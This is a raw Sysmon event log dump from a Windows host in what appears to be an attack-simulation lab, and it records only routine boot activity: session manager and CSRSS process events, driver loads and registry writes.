13:33:56.236{59A5CD1D-8E44-6005-0600-00000000A301}704708C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.244{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe- 10341000x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.236{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.236{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.239{59A5CD1D-8E44-6005-0600-00000000A301}704C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000dc 0000007c C:\Windows\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{59A5CD1D-8E42-6005-0200-00000000A301}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.236{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\VolatileSettings\{5b45201d-f2f2-4f3b-85bb-30ff1f953599}Binary Data 13241300x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\Video\ServiceBasicDisplay 13241300x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\CountDWORD (0x00000001) 13241300x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:56.143{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\0DISPLAY\Default_Monitor\4&69f2b1a&0&UID0 10341000x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.080{59A5CD1D-8E43-6005-0400-00000000A301}632636C:\Windows\System32\smss.exe{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.095{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{59A5CD1D-8E43-6005-0400-00000000A301}632C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000c0 0000007c 10341000x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.971{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}632C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.971{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}632C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.982{59A5CD1D-8E43-6005-0400-00000000A301}632C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000c0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{59A5CD1D-8E42-6005-0200-00000000A301}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 644600x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.111C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:55.111C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 13241300x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.440{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Leave)Binary Data 10341000x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.440{59A5CD1D-8E42-6005-0200-00000000A301}448452C:\Windows\System32\smss.exe{59A5CD1D-8E42-6005-0300-00000000A301}588C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.422{59A5CD1D-8E42-6005-0300-00000000A301}588C:\Windows\System32\autochk.exe10.0.14393.4046 (rs1_release.201028-1803)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=4DEB2ED5AD84897181481B7567B3A90D,SHA256=85C6FF209D7BD3EF690F0AC7EEF0FE0CB66D26090887E9ADB1E63C8EEF5E2C7B,IMPHASH=5F30E54B15CF4B4A5C756AEF16C9668F{59A5CD1D-8E42-6005-0200-00000000A301}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Enter)Binary Data 13241300x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.408{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\XEN\Unplug\NICSDWORD (0x00000001) 13241300x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 13241300x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMinorVersionDWORD (0x00000002) 644600x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.033C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 13241300x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMajorVersionDWORD (0x00000008) 13241300x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMinorVersionDWORD (0x00000001) 13241300x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\CountDWORD (0x00000001) 13241300x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.393{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\0XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0 13241300x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xenvif\Addresses\002:79:60:fa:8a:64 644600x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.018C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 13241300x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.283{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Parameters\WppRecorder_TraceGuid{09281f1f-f66e-485a-99a2-91638f782c49} 13241300x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.283{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\i8042prt\Parameters\WppRecorder_TraceGuid{7ffb8eb8-2c86-45d6-a7c5-c023d9c070c1} 13241300x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.221{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.221{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.221{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.205{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.205{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMajorVersionDWORD (0x00000001) 13241300x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.205{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.205{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.190{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.190{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.190{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMinorVersionDWORD (0x00000028) 13241300x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.190{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.065{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\cdrom\Parameters\WppRecorder_TraceGuid{a4196372-c3c4-42d5-87bf-7edb2e9bcc27} 13241300x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\CountDWORD (0x00000001) 13241300x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 13241300x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\CountDWORD (0x00000001) 13241300x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 434400x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local2021-01-18 13:34:15.223Started13.014.50 10341000x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4600-00000000A301}3932C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 